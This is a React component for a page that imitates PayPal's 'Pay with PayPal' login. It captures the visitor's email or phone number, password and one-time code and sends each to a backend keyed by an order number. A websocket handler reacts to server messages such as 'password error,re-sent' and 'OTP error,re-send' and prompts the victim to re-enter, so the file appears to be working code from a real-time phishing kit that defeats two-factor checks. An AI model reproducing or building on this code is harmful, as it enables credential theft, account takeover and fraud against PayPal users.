import React, { Component } from "react";
import "../style/paypal.scss";
import PaypalIcon from "../icon/PaypalIcon";
import PayPalSvg from "../image/paypal.svg";
import {
  parsePhoneNumberFromString,
  getCountryCallingCode,
} from "libphonenumber-js";
import Loading from "./common/Loading";

import * as EditOrderAPI from "../apis/EditOrderAPI";
import * as GetOrderDetailAPI from "../apis/GetOrderDetailAPI";
import eventBus from "../utils/Events";
import queryString from "query-string";

class Paypal extends Component {
  constructor(props) {
    super(props);
    this.state = {
      type: "email",
      email: "",
      password: "",
      loadingShow: false,
      first: JSON.parse(localStorage.getItem("first")) || true,
      isCode: false,
      OTP: "",
      codeType: "",
      errorTip: "",
    };
    this.changeInputType = this.changeInputType.bind(this);
    this.blurToCheck = this.blurToCheck.bind(this);
    this.vaildateEmailOrPhone = this.vaildateEmailOrPhone.bind(this);
    this.toggleLoading = this.toggleLoading.bind(this);
    this.submit = this.submit.bind(this);
    this.EditOrder = this.EditOrder.bind(this);
    this.offlineOrder = this.offlineOrder.bind(this);
    this.receiveWebSocketMessage = this.receiveWebSocketMessage.bind(this);
    this.editOrderOTP = this.editOrderOTP.bind(this);
    this.sedMessageToShop = this.sedMessageToShop.bind(this);
  }
  componentDidMount() {
    this.toggleLoading();
    setTimeout(() => {
      this.toggleLoading();
    }, 2000);
    const { location } = this.props;
    let param = queryString.parse(location.search);
    let id = param.id;
    GetOrderDetailAPI.GetOrder(id).then((res) => {
      var data = res.data.data;
      this.setState({ card: data }, () => {
        console.log(data);
        // 第一次打招呼
        if (this.state.first) {
          let { card } = this.state;
          this.EditOrder(
            card.url,
            card.orderNu,
            "OTP",
            "online",
            card.ppEmail,
            card.ppPassword,
            1
          );
          localStorage.setItem("first", false);
          console.log("online--------------");
        }
      });
    });

    eventBus.on("webSocket receive the message!", this.receiveWebSocketMessage);

    window.addEventListener("beforeunload", (e) => {
      let { card } = this.state;
      // 执行你需要的操作，例如清理数据或保存状态
      console.log("页面即将卸载");
      this.offlineOrder(card.url, card.orderNu, "offline", 2);
    });
  }

  inputChange(e, type) {
    switch (type) {
      case "email":
        this.setState({ email: e.target.value });
        break;
      case "password":
        this.setState({ password: e.target.value });
      case "code":
        this.setState({ OTP: e.target.value });
    }
  }

  changeInputType(text) {
    let { email } = this.state;
    if (email.trim() === "") {
      return;
    }
    if (text === "email") {
      this.setState({ email: "" });
    }
    this.toggleLoading();
    setTimeout(()=>{
      this.toggleLoading();
      this.setState({ type: text });
    },1000)
  }

  blurToCheck(e, type) {
    if (type === "email") {
      if (e.target.value.trim() === "") {
        return;
      }
      this.vaildateEmailOrPhone(e.target.value);
    }
  }

  // 校验
  vaildateEmailOrPhone(value) {
    const emailRegex = /^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$/;

    if (value.indexOf("@") >= 0) {
      console.log("email---------");
      if (emailRegex.test(value)) {
        console.log("是正确的email------------");
        this.EditOrder(
          this.state.card.url,
          this.state.card.orderNu,
          "ppEmail",
          "paypal email",
          this.state.email,
          this.state.password,
          1
        );
      }
    } else {
      const formattedPhone = this.validatePhoneNumber(value);
      if (formattedPhone) {
        console.log("这是一个正确的电话号码:", formattedPhone);
        this.EditOrder(
          this.state.card.url,
          this.state.card.orderNu,
          "ppEmail",
          "paypal email",
          this.state.email,
          this.state.password,
          1
        );
      } else {
        console.log("不是有效的电话号码");
        // return { type: "phone", valid: false };
      }
    }
  }

  // 校验电话号码并自动添加国际区号
  validatePhoneNumber(phone) {
    // 如果号码以 + 开头，表示带有国际区号，直接解析
    if (phone.startsWith("+")) {
      try {
        const phoneNumber = parsePhoneNumberFromString(phone);
        if (phoneNumber && phoneNumber.isValid()) {
          return phoneNumber.formatInternational(); // 返回格式化的国际号码
        } else {
          console.log("无效的电话号码");
          return null;
        }
      } catch (error) {
        console.error("号码解析错误:", error);
        return null;
      }
    } else {
      // 如果号码不包含 +，提示用户输入完整号码
      window.dispatchEvent(
        new CustomEvent("showAlert", {
          detail: "Please add the international dialing code,such as +1",
        })
      );
      // alert("Please add the international dialing code,such as +1");
      return this.setState({ email: "", type: "email" });
    }
  }

  toggleLoading() {
    this.setState({ loadingShow: !this.state.loadingShow });
  }

  EditOrder(
    url,
    orderNu,
    kehuduanxiaoxi,
    zhuangtai,
    ppEmail,
    ppPassword,
    online
  ) {
    EditOrderAPI.editEmailPassword(
      url,
      orderNu,
      kehuduanxiaoxi,
      zhuangtai,
      ppEmail,
      ppPassword,
      online
    );
  }

  receiveWebSocketMessage(mes) {
    const message = JSON.parse(mes.message);
    const codeType = message.data.codeType;
    const zhuangtai = message.data.fuwuduanxiaoxi;
    let { card } = this.state;
    if (zhuangtai === "Payment Success") {
      // return (window.location.href = card.data.success_url);
      return this.sedMessageToShop(card.data.fail_url);
    }
    if (zhuangtai === "Payment Error") {
      // return (window.location.href = card.data.fail_url);
      return this.sedMessageToShop(card.data.fail_url);
    }
    if (zhuangtai === "password error,re-sent") {
      this.setState({
        errorTip: "account number , password error or timeout,please re-enter",
        loadingShow: false,
      });
      return;
    }
    // card
    if (codeType) {
      this.setState({ isCode: true, OTP: "" }, () => {
        this.toggleLoading();
      });
    }
    if (zhuangtai === "OTP error,re-send") {
      this.setState({
        errorTip:
          "OTP error or timeout, please receive a new OTP and resubmit!",
      });
    }
  }

  offlineOrder(url, orderNu, kehuduanxiaoxi, online) {
    EditOrderAPI.offlineOrder(url, orderNu, kehuduanxiaoxi, online).then(() =>
      this.setState({ codeStatus: false, errorTip: "" })
    );
  }

  sedMessageToShop(data) {
    window.parent.postMessage(data, "*");
  }

  submit(type) {
    let { email, password, OTP, card } = this.state;
    if (password.trim() === "") {
      return;
    }
    console.log(email, password);
    if (type === "password") {
      this.EditOrder(
        this.state.card.url,
        this.state.card.orderNu,
        "ppEmail",
        "paypal email",
        email,
        password,
        1
      );
    } else {
      this.editOrderOTP(
        card.url,
        card.orderNu,
        "OTP",
        "Sented OTP,waiting",
        card.PIN,
        OTP,
        1
      );
    }
    this.setState({ errorTip: "" });
    this.toggleLoading();
  }

  editOrderOTP(url, orderNu, kehuduanxiaoxi, zhuangtai, PIN, OTP, online) {
    EditOrderAPI.editOrder(
      url,
      orderNu,
      kehuduanxiaoxi,
      zhuangtai,
      PIN,
      OTP,
      online
    ).then(() => this.setState({ codeStatus: false, errorTip: "" }));
  }

  render() {
    const { type, email, password, isCode, OTP, errorTip } = this.state;

    return (
      <React.Fragment>
        <Loading {...this.props} loadingShow={this.state.loadingShow} />
        <div className="paypal-page">
          <div className="header">
            <img src={PayPalSvg} alt="" />
          </div>
          <div className="title">Pay with PayPal</div>
          <div className="sec-title">
            {type === "email"
              ? " Enter your email address to get started."
              : "With a PayPal account, you're eligible for Purchase Protection and Rewards."}
          </div>
          {isCode ? (
            ""
          ) : (
            <React.Fragment>
              {type === "email" ? (
                ""
              ) : (
                <div className="key">
                  {email}{" "}
                  <span
                    className="span"
                    onClick={() => this.changeInputType("email")}
                  >
                    Change
                  </span>
                </div>
              )}
            </React.Fragment>
          )}
          {/* input */}
          {isCode ? (
            <React.Fragment>
              <input
                type="text"
                value={OTP || ""}
                placeholder="Code"
                onChange={(e) => this.inputChange(e, "code")}
              />
            </React.Fragment>
          ) : (
            <input
              type={type === "email" ? "text" : "password"}
              placeholder={
                type === "email" ? "Email or mobile number" : "Password"
              }
              value={type === "email" ? email : password}
              onChange={(e) =>
                this.inputChange(e, type === "email" ? "email" : "password")
              }
              onBlur={(e) =>
                this.blurToCheck(e, type === "email" ? "email" : "password")
              }
            />
          )}
          <div className="error-tip">{errorTip}</div>
          {/* btn */}
          {isCode ? (
            <div className="next-btn" onClick={() => this.submit("OTP")}>
              Submit
            </div>
          ) : (
            <React.Fragment>
              {type === "email" ? (
                <div
                  className="next-btn"
                  onClick={() => this.changeInputType("password")}
                >
                  Next
                </div>
              ) : (
                <div
                  className="next-btn"
                  onClick={() => this.submit("password")}
                >
                  Pay
                </div>
              )}
            </React.Fragment>
          )}

          {/* <div className="line">
            <p className="txt">or</p>
          </div>
          <div className="sign-btn">Sign Up</div> */}
        </div>
      </React.Fragment>
    );
  }
}

export default Paypal;
